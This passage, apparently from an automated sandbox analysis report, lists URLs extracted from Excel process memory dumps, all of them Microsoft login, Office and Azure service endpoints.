Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize(
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize(f
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize)
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize)g
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize-
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize/
Source: EXCEL.EXE, 00000000.00000002.965380107.0000000013197000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize018
Source: EXCEL.EXE, 00000000.00000002.962261125.000000000DDDF000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize1x
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize3
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize8
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize9
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize:
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize=
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorize?
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeO
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeP
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizePfT
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeQgk
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorized
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizee
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizefg
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizei
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeized
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizej
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizenh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeo
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizep
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizet
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizete
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizevfv
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizew
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://login.windows.net/common/oauth2/authorizez
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://management.azure.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://management.azure.com/
